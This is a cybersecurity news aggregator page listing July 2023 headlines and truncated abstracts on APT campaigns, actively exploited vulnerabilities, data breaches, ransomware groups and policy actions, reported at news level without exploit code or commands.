The prolific China-linked nation-state actor known as APT41 has been linked to two previously undocumented strains of Android spyware called WyrmSpy and DragonEgg. "Known for its exploitation of web-facing applications and infiltration of traditional endpoint devices, an established threat actor like APT 41 including mobile in its arsenal of malware shows how mobile endpoints are high-value targets with coveted corporate and personal data," Lookout said in a report shared with The Hacker News. APT41, also tracked under the names Axiom, Blackfly, Brass Typhoon (formerly Barium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti, is known to be operational since at least 2007, targeting a wide range of industries to conduct intellectual property theft. Recent attacks mounted by the adversarial collective have leveraged an open-source red teaming tool known as Google Command and Control (GC2) as part of attacks aimed at media and job platforms in Taiwan and Italy. The initThe Hacker News
July 19, 2023 – Vulnerabilities
Citrix warns of actively exploited zero-day in ADC and Gateway Full Text
Abstract
Citrix is warning customers of an actively exploited critical vulnerability in NetScaler Application Delivery Controller (ADC) and Gateway. Citrix is warning customers of a critical vulnerability, tracked as CVE-2023-3519 (CVSS score: 9.8), in NetScaler...Security Affairs
July 19, 2023 – Outage
Norwegian Mining and Recycling Company TOMRA Experiences Disruptive Cyberattack Full Text
Abstract
The cyberattack on TOMRA highlights the ongoing threat to companies involved in critical infrastructure, with potential significant financial and social damage if operations are disrupted.Cyware
July 19, 2023 – Criminals
Exploring the Dark Side: OSINT Tools and Techniques for Unmasking Dark Web Operations Full Text
Abstract
On April 5, 2023, the FBI and Dutch National Police announced the takedown of Genesis Market , one of the largest dark web marketplaces. The operation, dubbed "Operation Cookie Monster," resulted in the arrest of 119 people and the seizure of over $1M in cryptocurrency. You can read the FBI's warrant here for details specific to this case. In light of these events, I'd like to discuss how OSINT can assist with dark web investigations. The Dark Web's anonymity attracts a variety of users, from whistleblowers and political activists to cybercriminals and terrorists. There are several techniques that can be used to try and identify the individuals behind these sites and personas. Technical Vulnerabilities While not considered OSINT, there have been instances when technical vulnerabilities have existed in the technology used to host dark websites. These vulnerabilities may exist in the software itself or be due to misconfigurations, but they can sometimes reveaThe Hacker News
July 19, 2023 – Breach
FIA World Endurance Championship driver passports leaked Full Text
Abstract
Le Mans Endurance Management, operating the FIA World Endurance Championship’s website, exposed the data of hundreds of drivers by leaking their IDs and drivers’ licenses, the Cybernews research team has discovered. On June 16th, our researchers...Security Affairs
July 19, 2023 – General
Trends in Ransomware-as-a-Service and Cryptocurrency to Monitor Full Text
Abstract
To defend against RaaS groups, organizations need a holistic, defense-in-depth approach that includes measures like multi-factor authentication, email security, patch management, and comprehensive asset management.Cyware
July 19, 2023 – Vulnerabilities
Bad.Build Flaw in Google Cloud Build Raises Concerns of Privilege Escalation Full Text
Abstract
Cybersecurity researchers have uncovered a privilege escalation vulnerability in Google Cloud that could enable malicious actors tamper with application images and infect users, leading to supply chain attacks. The issue, dubbed Bad.Build , is rooted in the Google Cloud Build service , according to cloud security firm Orca, which discovered and reported the issue. "By abusing the flaw and enabling an impersonation of the default Cloud Build service, attackers can manipulate images in the Google Artifact Registry and inject malicious code," the company said in a statement shared with The Hacker News. "Any applications built from the manipulated images are then affected and, if the malformed applications are meant to be deployed on customer's environments, the risk crosses from the supplying organization's environment to their customers' environments, constituting a major supply chain risk." Following responsible disclosure, Google has issued aThe Hacker News
July 19, 2023 – Criminals
Ukraine Police Bust Another Bot Farm Accused of Pro-Russia Propaganda, Internet Fraud Full Text
Abstract
Ukraine's Cyber Police shut down yet another bot farm that was reportedly spreading disinformation about the war in Ukraine on social media, just one month after a similar illicit operation was raided in west-central Ukraine.Cyware
July 19, 2023 – Privacy
U.S. Government Blacklists Cytrox and Intellexa Spyware Vendors for Cyber Espionage Full Text
Abstract
The U.S. government on Tuesday added two foreign commercial spyware vendors, Cytrox and Intellexa, to an economic blocklist for weaponizing cyber exploits to gain unauthorized access to devices and "threatening the privacy and security of individuals and organizations worldwide." This includes the companies' corporate holdings in Hungary (Cytrox Holdings Crt), North Macedonia (Cytrox AD), Greece (Intellexa S.A.), and Ireland (Intellexa Limited). By adding to the economic denylist, it prohibits U.S. companies from transacting with these businesses. "Recognizing the increasingly key role that surveillance technology plays in enabling campaigns of repression and other human rights abuses, the Commerce Department's action today targets these entities' ability to access commodities, software, and technology that could contribute to the development of surveillance tools that pose a risk of misuse in violations or abuses of human rights," the Bureau of IndusThe Hacker News
July 19, 2023 – Insider Threat
FIA World Endurance Championship Driver Passports Left Unsecured Full Text
Abstract
On June 16th, Cybernews researchers came across two misconfigured, meaning publicly exposed, Google Cloud Storage buckets. Both combined, they contained over 1.1 million files.Cyware
July 19, 2023 – Vulnerabilities
Zero-Day Attacks Exploited Critical Vulnerability in Citrix ADC and Gateway Full Text
Abstract
Citrix is alerting users of a critical security flaw in NetScaler Application Delivery Controller (ADC) and Gateway that it said is being actively exploited in the wild. Tracked as CVE-2023-3519 (CVSS score: 9.8), the issue relates to a case of code injection that could result in unauthenticated remote code execution. It impacts the following versions - NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13 NetScaler ADC and NetScaler Gateway version 12.1 (currently end-of-life) NetScaler ADC 13.1-FIPS before 13.1-37.159 NetScaler ADC 12.1-FIPS before 12.1-55.297, and NetScaler ADC 12.1-NDcPP before 12.1-55.297 The company did not give further details on the flaw tied to CVE-2023-3519 other than to say that exploits for the flaw have been observed on "unmitigated appliances." However, successful exploitation requires the device to be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDThe Hacker News
July 18, 2023
Gamaredon APT Steals Data Within an Hour Full Text
Abstract
Once again, the Gamaredon APT is carrying out a new wave of phishing attacks targeting Ukrainian government agencies, stealing data within an hour of the attack. The campaign is aimed at entities in Ukraine, including security services, military, and government organizations. It is advised tha ... Read MoreCyware
July 18, 2023 – Attack
Pakistani Entities Targeted in Sophisticated Attack Deploying ShadowPad Malware Full Text
Abstract
An unidentified threat actor compromised an application used by multiple entities in Pakistan to deliver ShadowPad , a successor to the PlugX backdoor that's commonly associated with Chinese hacking crews . Targets included a Pakistan government entity, a public sector bank, and a telecommunications provider, according to Trend Micro. The infections took place between mid-February 2022 and September 2022. The cybersecurity company said the incident could be the result of a supply-chain attack, in which a legitimate piece of software used by targets of interest is trojanized to deploy malware capable of gathering sensitive information from compromised systems. The attack chain takes the form of a malicious installer for E-Office , an application developed by the National Information Technology Board (NITB) of Pakistan to help government departments go paperless. It's currently not clear how the backdoored E-Office installer was delivered to the targets. That said, there&The Hacker News
July 18, 2023 – Breach
Virustotal data leak exposed data of some registered customers, including intelligence members Full Text
Abstract
The online malware scanning service VirusTotal leaked data associated with some registered customers, German newspapers reported. German newspapers Der Spiegel and Der Standard reported that the online malware scanning service VirusTotal leaked...Security Affairs
July 18, 2023 – Policy and Law
Update: UKG Agrees to Pay Up to $6M in Lawsuit Tied to 2021 Breach Full Text
Abstract
The ransomware attack, which impacted multiple UKG customers such as Tesla, PepsiCo, Whole Foods, and New York City’s Metropolitan Transportation Authority, hindered some customers’ ability to process payroll.Cyware
July 18, 2023 – Insider Threat
VirusTotal Data Leak Exposes Some Registered Customers’ Details Full Text
Abstract
Data associated with a subset of registered customers of VirusTotal, including their names and email addresses, were exposed after an employee inadvertently uploaded the information to the malware scanning platform. The security incident, which comprises a database of 5,600 names in a 313KB file, was first disclosed by Der Spiegel and Der Standard yesterday. Launched in 2004, VirusTotal is a popular service that analyzes suspicious files and URLs to detect types of malware and malicious content using antivirus engines and website scanners. It was acquired by Google in 2012 and became a subsidiary of Google Cloud's Chronicle unit in 2018. When reached for comment, Google confirmed the leak and said it took immediate steps to remove the data. "We are aware of the unintentional distribution of a small segment of customer group administrator emails and organization names by one of our employees on the VirusTotal platform," a Google Cloud spokesperson told The HackerThe Hacker News
July 18, 2023 – Criminals
FIN8 Group spotted delivering the BlackCat Ransomware Full Text
Abstract
The cybercrime group FIN8 is using a revamped version of the Sardonic backdoor to deliver the BlackCat ransomware. The financially motivated group FIN8 (aka Syssphinx) was spotted using a revamped version of a backdoor tracked as Sardonic to deliver...Security Affairs
July 18, 2023 – Criminals
Black Hat Hacker Exposes Real Identity After Infecting Own Computer With Malware Full Text
Abstract
Using the online moniker ‘La_Citrix’, the threat actor has been active on Russian-speaking cybercrime forums since 2020, offering access to hacked companies and info-stealer logs from active infections.Cyware
July 18, 2023 – Criminals
Go Beyond the Headlines for Deeper Dives into the Cybercriminal Underground Full Text
Abstract
Discover stories about threat actors' latest tactics, techniques, and procedures from Cybersixgill's threat experts each month. Each story brings you details on emerging underground threats, the threat actors involved, and how you can take action to mitigate risks. Learn about the top vulnerabilities and review the latest ransomware and malware trends from the deep and dark web. Stolen ChatGPT credentials flood dark web markets Over the past year, 100,000 stolen credentials for ChatGPT were advertised on underground sites, being sold for as little as $5 on dark web marketplaces in addition to being offered for free. Stolen ChatGPT credentials include usernames, passwords, and other personal information associated with accounts. This is problematic because ChatGPT accounts may store sensitive information from queries, including confidential data and intellectual property. Specifically, companies increasingly incorporate ChatGPT into daily workflows, which means employees may discloseThe Hacker News
July 18, 2023 – Attack
Hacking campaign targets sites using WordPress WooCommerce Payments Plugin Full Text
Abstract
Threat actors are actively exploiting a critical flaw, tracked as CVE-2023-28121, in the WooCommerce Payments WordPress plugin. Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2023-28121 (CVSS score:...Security Affairs
July 18, 2023 – Government
White House Unveils Consumer Labeling Program to Strengthen IoT Security Full Text
Abstract
The Biden administration has considered an Energy Star type of consumer labeling program a key part of an effort to strengthen the nation’s cyber infrastructure following the SolarWinds and Colonial Pipeline attacks.Cyware
July 18, 2023 – Criminals
FIN8 Group Using Modified Sardonic Backdoor for BlackCat Ransomware Attacks Full Text
Abstract
The financially motivated threat actor known as FIN8 has been observed using a "revamped" version of a backdoor called Sardonic to deliver the BlackCat ransomware . According to the Symantec Threat Hunter Team, part of Broadcom, the development is an attempt on the part of the e-crime group to diversify its focus and maximize profits from infected entities. The intrusion attempt took place in December 2022. FIN8 is being tracked by the cybersecurity company under the name Syssphinx. Known to be active since at least 2016, the adversary was originally attributed to attacks targeting point-of-sale (PoS) systems using malware such as PUNCHTRACK and BADHATCH. The group resurfaced after more than a year in March 2021 with an updated version of BADHATCH, following it up with a completely new bespoke implant called Sardonic , which was disclosed by Bitdefender in August 2021. "The C++-based Sardonic backdoor has the ability to harvest system information and execute coThe Hacker News
July 18, 2023 – Attack
JumpCloud revealed it was hit by a sophisticated attack by a nation-state actor Full Text
Abstract
Software firm JumpCloud announced it was the victim of a sophisticated cyber attack carried out by a nation-state actor. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless...Security Affairs
July 18, 2023 – Breach
Phoenician Medical Center Cyberattack Affects Up to 162,500 Patients Full Text
Abstract
The forensic investigation confirmed that there had been unauthorized access to files containing the protected health information of patients, some of which may have been obtained by the hackers.Cyware
July 18, 2023 – Policy and Law
Owner of BreachForums Pleads Guilty to Cybercrime and Child Pornography Charges Full Text
Abstract
Conor Brian Fitzpatrick , the owner of the now-defunct BreachForums website, has pleaded guilty to charges related to his operation of the cybercrime forum as well as having child pornography images. The development, first reported by DataBreaches.net last week, comes nearly four months after Fitzpatrick (aka pompompurin) was formally charged in the U.S. with conspiracy to commit access device fraud and possession of child pornography. BreachForums, launched in March 2022, operated as an illegal marketplace that allowed its members to trade hacked or stolen databases, enabling other criminal actors to gain unauthorized access to target systems. It was shut down in March 2023 shortly after Fitzpatrick's arrest in New York. As many as 888 databases consisting of 14 billion individual records are estimated to have been found in total. The forum had over 333,000 members prior to its takedown. "The purpose of BreachForums, and Fitzpatrick's intent in operating the fThe Hacker News
July 18, 2023 – Breach
‘Millions of emails’ for US military sent to .ml addresses Full Text
Abstract
For the past decade, millions of emails destined for .mil US military addresses were actually directed at .ml addresses, that being the top-level domain for the African nation of Mali, it's claimed.Cyware
July 18, 2023 – Criminals
Cybercriminals Exploiting WooCommerce Payments Plugin Flaw to Hijack Websites Full Text
Abstract
Threat actors are actively exploiting a recently disclosed critical security flaw in the WooCommerce Payments WordPress plugin as part of a massive targeted campaign. The flaw, tracked as CVE-2023-28121 (CVSS score: 9.8), is a case of authentication bypass that enables unauthenticated attackers to impersonate arbitrary users and perform some actions as the impersonated user, including an administrator, potentially leading to site takeover. "Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on Thursday, July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on Saturday, July 16, 2023," Wordfence security researcher Ram Gall said in a Monday post. Versions 4.8.0 through 5.6.1 of WooCommerce Payments are vulnerable. The plugin is installed on over 600,000 sites. Patches for the bug were released by WooCommerce back in March 2023, with WordPress issuing auto-updates to sites using affected versions ofThe Hacker News
July 18, 2023 – General
Growing Scam Activity Linked to Social Media and Automation Full Text
Abstract
The average number of scam resources per brand across all regions and industries more than doubled year-on-year in 2022, up 162%, according to Group-IB. Additionally, the total number of scam pages detected in 2022 was more than thrice in 2021.Cyware
July 18, 2023 – Breach
JumpCloud Blames ‘Sophisticated Nation-State’ Actor for Security Breach Full Text
Abstract
A little over a week after JumpCloud reset API keys of customers impacted by a security incident, the company said the intrusion was the work of a sophisticated nation-state actor. The adversary "gained unauthorized access to our systems to target a small and specific set of our customers," Bob Phan, chief information security officer (CISO) at JumpCloud, said in a post-mortem report. "The attack vector used by the threat actor has been mitigated." The U.S. enterprise software firm said it identified anomalous activity on June 27, 2023, on an internal orchestration system, which it traced back to a spear-phishing campaign mounted by the attacker on June 22. While JumpCloud said it took security steps to shield its network by rotating credentials and rebuilding its systems, it wasn't until July 5 when it detected "unusual activity" in the commands framework for a small set of customers, prompting a forced-rotation of all admin API keys. The numThe Hacker News
July 18, 2023 – Breach
Dating App That Claims 50 Million Users Suffered a Data Breach Full Text
Abstract
Cybersecurity researcher Jeremiah Fowler discovered a non-password-protected database containing approximately 2.3 million records associated with multiple dating applications.Cyware
July 17, 2023 – Phishing
Meta’s Threads App Used as a Lure Full Text
Abstract
Researchers with Veriti are warning about “over 700 domains related to Threads being registered daily” in recent weeks, offering an Android version of the app for download outside of Google’s official app store.Cyware
July 17, 2023 – Phishing
Hackers Exploit WebAPK to Deceive Android Users into Installing Malicious Apps Full Text
Abstract
Threat actors are taking advantage of Android's WebAPK technology to trick unsuspecting users into installing malicious web apps on Android phones that are designed to capture sensitive personal information. "The attack began with victims receiving SMS messages suggesting the need to update a mobile banking application," researchers from CSIRT KNF said in an analysis released last week. "The link contained in the message led to a site that used WebAPK technology to install a malicious application on the victim's device." The application impersonates PKO Bank Polski, a multinational banking and financial services company headquartered in Warsaw. Details of the campaign were first shared by Polish cybersecurity firm RIFFSEC. WebAPK allows users to install progressive web apps (PWAs) to their home screen on Android devices without having to use the Google Play Store. "When a user installs a PWA from Google Chrome and a WebAPK is used, the mintiThe Hacker News
July 17, 2023 – Vulnerabilities
Adobe warns customers of a critical ColdFusion RCE exploited in attacks Full Text
Abstract
Adobe is warning customers of a critical ColdFusion pre-authentication RCE bug, tracked as CVE-2023-29300, which is actively exploited. Adobe warns customers of a critical ColdFusion pre-authentication remote code execution vulnerability, tracked...Security Affairs
July 17, 2023 – Vulnerabilities
Exploitation of ColdFusion Vulnerability Reported as Adobe Patches Another Critical Flaw Full Text
Abstract
Tracked as CVE-2023-38203 (CVSS score of 9.8), the flaw is described as “deserialization of untrusted data” in ColdFusion versions 2023, 2021, and?2018. This allows an attacker to use specially crafted data to trigger the execution of arbitrary code.Cyware
July 17, 2023 – Solution
These 6 Questions Will Help You Choose the Best Attack Surface Management Platform Full Text
Abstract
The hype around different security categories can make it difficult to discern features and capabilities from bias when researching new platforms. You want to advance your security measures, but what steps actually make sense for your business? For anyone ready to find an attack surface management (ASM) vendor , review these six questions before getting started to understand the key features to look for in an ASM platform and the qualities of the vendor who supports it. Refer to these as your quick guide for interviewing vendors to walk away with the most suitable ASM platform for your needs. Checklist: 6 Questions to Ask Attack Surface Management Vendors Does your platform have the capability to discover the unknown? How do you prevent alert fatigue, prioritize alerts and remove false positives? Can you track attack surface changes over time? How do you plan to evolve the platform going forward? What services related to ASM do you offer? Can we demo or test run the plThe Hacker News
July 17, 2023 – Criminals
Admins of Genesis Market marketplace sold their infrastructure on a hacker forum Full Text
Abstract
The admins of the darkweb Genesis Market announced the sale of their platform to a threat actor that will restart operations next month. In April, the FBI seized the Genesis Market, a black marketplace for stolen credentials that was launched in 2017....Security Affairs
July 17, 2023 – Malware
Update: Google Removes Swing VPN Android App Exposed as DDoS Botnet Full Text
Abstract
The incident serves as a reminder that even seemingly legitimate apps can harbor dangerous intentions, highlighting the importance of staying informed and vigilant against cyber threats.Cyware
July 17, 2023 – General
Malicious USB Drives Targetinging Global Targets with SOGU and SNOWYDRIVE Malware Full Text
Abstract
Cyber attacks using infected USB infection drives as an initial access vector have witnessed a three-fold increase in the first half of 2023, That's according to new findings from Mandiant, which detailed two such campaigns – SOGU and SNOWYDRIVE – targeting both public and private sector entities across the world. SOGU is the "most prevalent USB-based cyber espionage attack using USB flash drives and one of the most aggressive cyber espionage campaigns targeting both public and private sector organizations globally across industry verticals," the Google-owned threat intelligence firm said . The activity has been attributed to a China-based cluster called TEMP.Hex, which is also tracked under the names Camaro Dragon, Earth Preta, and Mustang Panda. Targets include construction and engineering, business services, government, health, transportation, and retail in Europe, Asia, and the U.S. The infection chain detailed by Mandiant exhibits tactical commonalities withThe Hacker News
July 17, 2023 – Attack
Hackers Target Pakistani Government, Bank, and Telecom Provider With China-Made Malware Full Text
Abstract
Cybersecurity firm Trend Micro identified three entities in Pakistan targeted by Shadowpad last year: an unnamed government agency, a state bank, and a telecommunications provider.Cyware
July 17, 2023 – Criminals
Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware Full Text
Abstract
Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called LokiBot on compromised systems. "LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said . "It primarily targets Windows systems and aims to gather sensitive information from infected machines." The cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of CVE-2021-40444 and CVE-2022-30190 (aka Follina) to achieve code execution. The Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot. The injector also features evasion techniques to check for the presence of debuggers aThe Hacker News
July 17, 2023 – Breach
Global Data Breach Could Impact 70,000 Residents, Vendor Employees With Hillsborough County Full Text
Abstract
Hillsborough County said they've mailed notification letters to 70,636 people who are clients of Healthcare services and vendors of aging services who they know were impacted.Cyware
July 17, 2023
Russia-Linked Gamaredon APT Starts Stealing Data From Victims Between 30 and 50 Minutes After the Initial Compromise Full Text
Abstract
The Russia-linked APT group employs spear-phishing emails and messages, such as on Telegram and Signal, to trick victims into opening malicious attachments. Gamaredon uses malware and PowerShell scripts for reconnaissance and executing commands.Cyware
July 17, 2023 – Malware
New AVrecon Malware Infects 70,000 Linux Routers Across 20 Countries Full Text
Abstract
A stealthy Linux malware, dubbed AVrecon, was found targeting more than 70,000 Linux-based SOHO routers at least since May 2021. It reportedly hijacked these devices to form a botnet that could steal bandwidth and provide a hidden residential proxy service. A total of 15 second-stage control server ... Read MoreCyware
July 17, 2023 – Attack
Hackers Target Reddit Alternative Lemmy via Zero-Day Vulnerability Full Text
Abstract
A few days ago, an attacker leveraged a cross-site scripting (XSS) vulnerability to deface pages on some popular instances, including Lemmy.world, the most popular instance, which has over 100,000 users.Cyware
July 17, 2023 – Hacker
CERT-UA Uncovers Gamaredon’s Rapid Data Exfiltration Tactics Following Initial Compromise Full Text
Abstract
The Russia-linked threat actor known as Gamaredon has been observed conducting data exfiltration activities within an hour of the initial compromise. "As a vector of primary compromise, for the most part, emails and messages in messengers (Telegram, WhatsApp, Signal) are used, in most cases, using previously compromised accounts," the Computer Emergency Response Team of Ukraine (CERT-UA) said in an analysis of the group published last week. Gamaredon , also called Aqua Blizzard, Armageddon, Shuckworm, or UAC-0010, is a state-sponsored actor with ties to the SBU Main Office in the Autonomous Republic of Crimea, which was annexed by Russia in 2014. The group is estimated to have infected thousands of government computers. It is also one of the many Russian hacking crews that have maintained an active presence since the start of the Russo-Ukrainian war in February 2022, leveraging phishing campaigns to deliver PowerShell backdoors such as GammaSteel to conduct reconThe Hacker News
July 17, 2023 – Vulnerabilities
Cisco fixed a critical flaw in SD-WAN vManage Full Text
Abstract
Cisco warns of a critical unauthenticated REST API access vulnerability, tracked as CVE-2023-20214, impacting its SD-WAN vManage. Cisco addressed a critical unauthenticated REST API access vulnerability, tracked as CVE-2023-20214 (CVSS Score 9.1),...Security Affairs
July 17, 2023 – Government
FCC Chair Proposes $200M Investment to Boost K-12 Cybersecurity Full Text
Abstract
The move follows urgent calls for the FCC to update its E-rate program to cover advanced firewalls and other network security measures. The pilot program is part of FCC Chairwoman Jessica Rosenworcel’s Learn Without Limits initiative.Cyware
July 17, 2023 – Policy and Law
Pompompurin, the BreachForums owner, pleads guilty to hacking charges and possession of child pornography Full Text
Abstract
The owner of the BreachForums Conor Brian Fitzpatrick, aka Pompompurin, pleads guilty to hacking charges. The owner of the BreachForums Conor Brian Fitzpatrick agrees to plead guilty to a three-count criminal information charging the defendant with...Security Affairs
July 16, 2023 – Malware
WormGPT, the generative AI tool to launch sophisticated BEC attacks Full Text
Abstract
The WormGPT case: How Generative artificial intelligence (AI) can improve the capabilities of cybercriminals and allows them to launch sophisticated attacks. Researchers from SlashNext warn of the dangers related to a new generative AI cybercrime...Security Affairs
July 15, 2023 – Criminals
WormGPT: New AI Tool Allows Cybercriminals to Launch Sophisticated Cyber Attacks Full Text
Abstract
With generative artificial intelligence (AI) becoming all the rage these days, it's perhaps not surprising that the technology has been repurposed by malicious actors to their own advantage, enabling avenues for accelerated cybercrime. According to findings from SlashNext, a new generative AI cybercrime tool called WormGPT has been advertised on underground forums as a way for adversaries to launch sophisticated phishing and business email compromise ( BEC ) attacks. "This tool presents itself as a blackhat alternative to GPT models, designed specifically for malicious activities," security researcher Daniel Kelley said . "Cybercriminals can use such technology to automate the creation of highly convincing fake emails, personalized to the recipient, thus increasing the chances of success for the attack." The author of the software has described it as the "biggest enemy of the well-known ChatGPT" that "lets you do all sorts of illegal stuff.The Hacker News
July 15, 2023 – General
USB Flash Drives for Malware Attack Surges Full Text
Abstract
Mandiant experts have observed a significant rise in malware attacks aimed at stealing sensitive information through the use of USB drives. The attacks targeted a variety of industries including those in construction, engineering, government, manufacturing, retail, media, and pharmaceutical. Organi ... Read MoreCyware
July 15, 2023 – Breach
Microsoft Bug Allowed Hackers to Breach Over Two Dozen Organizations via Forged Azure AD Tokens Full Text
Abstract
Microsoft on Friday said a validation error in its source code allowed for Azure Active Directory (Azure AD) tokens to be forged by a malicious actor known as Storm-0558 using a Microsoft account (MSA) consumer signing key to breach two dozen organizations. "Storm-0558 acquired an inactive MSA consumer signing key and used it to forge authentication tokens for Azure AD enterprise and MSA consumer to access OWA and Outlook.com," the tech giant said in a deeper analysis of the campaign. "The method by which the actor acquired the key is a matter of ongoing investigation." "Though the key was intended only for MSA accounts, a validation issue allowed this key to be trusted for signing Azure AD tokens. This issue has been corrected." It's not immediately clear if the token validation issue was exploited as a "zero-day vulnerability" or if Microsoft was already aware of the problem before it came under in-the-wild abuse. The attacks singlThe Hacker News
July 15, 2023 – Malware
Meet CustomerLoader: A Multifaceted Malware Unleashing Diverse Payloads Full Text
Abstract
An unreported .NET loader referred to as CustomerLoader is being distributed through deceptive phishing emails, YouTube videos, and web pages that mimicked genuine websites. This loader possesses the capability to retrieve, decrypt, and execute additional payloads.Cyware
July 15, 2023 – General
Security Affairs newsletter Round 428 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Russia-linked...Security Affairs
July 15, 2023 – General
Satellites lack standard security mechanisms found in mobile phones and laptops Full Text
Abstract
Researchers from Ruhr University Bochum and the CISPA Helmholtz Center for Information Security in Saarbrücken have assessed the security mechanisms of satellites currently orbiting the Earth from an IT perspective.Cyware
July 15, 2023
Russia-linked APT Gamaredon starts stealing data from victims between 30 and 50 minutes after the initial compromise Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT-UA) states that Russia-linked APT Gamaredon starts stealing data 30 minutes after the initial compromise. Ukraine's Computer Emergency Response Team (CERT-UA) is warning that the Russia-linked APT group...Security Affairs
July 15, 2023 – Privacy
Three Tax Prep Firms Shared ‘Extraordinarily Sensitive’ Data About Taxpayers With Meta, Lawmakers Say Full Text
Abstract
A group of congressional Democrats reported that three large tax preparation firms sent “extraordinarily sensitive” information on tens of millions of taxpayers to Facebook parent company Meta over the course of at least two years.Cyware
July 14, 2023 – Vulnerabilities
Popular WordPress Security Plugin Caught Logging Plaintext Passwords Full Text
Abstract
It was discovered that AIOS version 5.1.9 writes plaintext passwords from login attempts to the database, which essentially provides any privileged user with access to the login credentials of all other administrator users.Cyware
July 14, 2023 – Vulnerabilities
Critical Security Flaws Uncovered in Honeywell Experion DCS and QuickBlox Services Full Text
Abstract
Multiple security vulnerabilities have been discovered in various services, including Honeywell Experion distributed control system (DCS) and QuickBlox, that, if successfully exploited, could result in severe compromise of affected systems. Dubbed Crit.IX, the nine flaws in the Honeywell Experion DCS platform allow for "unauthorized remote code execution, which means an attacker would have the power to take over the devices and alter the operation of the DCS controller, whilst also hiding the alterations from the engineering workstation that manages the controller," Armis said in a statement shared with The Hacker News. Put differently, the issues relate to lack of encryption and adequate authentication mechanisms in a proprietary protocol called Control Data Access (CDA) that's used to communicate between Experion Servers and C300 controllers, effectively enabling a threat actor to take over the devices and alter the operation of the DCS controller. "As aThe Hacker News
July 14, 2023 – Breach
The source code of the BlackLotus UEFI Bootkit was leaked on GitHub Full Text
Abstract
The source code for the BlackLotus UEFI bootkit has been published on GitHub and experts warn of the risks of proliferation of custom versions. Researchers from ESET discovered in March a new stealthy Unified Extensible Firmware Interface (UEFI) bootkit,...Security Affairs
July 14, 2023 – Breach
BlackLotus UEFI Bootkit Source Code Leaked on GitHub Full Text
Abstract
The BlackLotus source code that was published on GitHub on Wednesday has been stripped of the ‘Baton Drop’ exploit targeting CVE-2022-21894, and uses the bootlicker UEFI firmware rootkit, but contains the rest of the original code.Cyware
July 14, 2023 – Insider Threat
Defend Against Insider Threats: Join this Webinar on SaaS Security Posture Management Full Text
Abstract
As security practices continue to evolve, one primary concern persists in the minds of security professionals—the risk of employees unintentionally or deliberately exposing vital information. Insider threats, whether originating from deliberate actions or accidental incidents, pose a significant challenge to safeguarding sensitive data. To effectively address insider risks, organizations must adopt a holistic approach that encompasses technical, procedural, and human elements. While access controls, encryption, and monitoring systems are crucial for identifying and mitigating unauthorized access and suspicious activities, the increasing prevalence of cloud-based environments and the surge in SaaS application usage demand a fresh perspective on Insider Risk Management from a SaaS security standpoint. Stay ahead of the game by embracing the SaaS security lens. Join us for an enlightening webinar where we will demonstrate how security practitioners can proactively adapt their approachThe Hacker News
July 14, 2023 – Government
US CISA warns of Rockwell Automation ControlLogix flaws Full Text
Abstract
The U.S. CISA warns of two flaws impacting Rockwell Automation ControlLogix that can lead to remote code execution and DoS attacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of two vulnerabilities affecting Rockwell...Security Affairs
July 14, 2023 – Government
CISA Gives US Civilian Agencies Until August 1 to Resolve Four Microsoft Vulnerabilities Full Text
Abstract
The inclusion of the four vulnerabilities — CVE-2023-32046, CVE-2023-32049, CVE-2023-35311, and CVE-2023-36874 — into CISA’s catalog means the bugs are already being exploited by hackers.Cyware
July 14, 2023 – Insider Threat
AIOS WordPress Plugin Faces Backlash for Storing User Passwords in Plain Text Full Text
Abstract
All-In-One Security (AIOS), a WordPress plugin installed on over one million sites, has issued a security update after a bug introduced in version 5.1.9 of the software caused users' passwords being added to the database in plaintext format. "A malicious site administrator (i.e. a user already logged into the site as an admin) could then have read them," UpdraftPlus, the maintainers of AIOS, said . "This would be a problem if those site administrators were to try out those passwords on other services where your users might have used the same password. If those other services' logins are not protected by two-factor authentication, this could be a risk to the affected website." The issue surfaced nearly three weeks ago when a user of the plugin reported the behavior, stating they were "absolutely shocked that a security plugin is making such a basic security 101 error." AIOS also noted that the updates remove the existing logged data from thThe Hacker News
July 14, 2023 – Vulnerabilities
Indexing Over 15 Million WordPress Websites with PWNPress Full Text
Abstract
Sicuranex's PWNPress platform indexed over 15 million WordPress websites, it collects data related to vulnerabilities and misconfigurations Leveraging the extensive Common Crawl dataset and pushing the boundaries of data analysis, cybersecurity firm...Security Affairs
July 14, 2023 – Business
Secure Code Warrior Lands $50M to Educate Developers on Best Cyber Practices Full Text
Abstract
With a recent $50 million Series C funding round led by Paladin Capital Group, Secure Code Warrior plans to improve its platform and expand its workforce to meet the growing demand for cybersecurity skills training.Cyware
July 14, 2023 – Attack
TeamTNT’s Cloud Credential Stealing Campaign Now Targets Azure and Google Cloud Full Text
Abstract
A malicious actor has been linked to a cloud credential stealing campaign in June 2023 that's focused on Azure and Google Cloud Platform (GCP) services, marking the adversary's expansion in targeting beyond Amazon Web Services (AWS). The findings come from SentinelOne and Permiso , which said the "campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew," although it emphasized that "attribution remains challenging with script-based tools." They also overlap with an ongoing TeamTNT campaign disclosed by Aqua called Silentbob that leverages misconfigured cloud services to drop malware as part of what's said to be a testing effort, while also linking SCARLETEEL attacks to the threat actor, citing infrastructure commonalities. "TeamTNT is scanning for credentials across multiple cloud environments, including AWS, Azure, and GCP," Aqua noted. The attacks, which single out public-facing Docker instancThe Hacker News
July 14, 2023 – Botnet
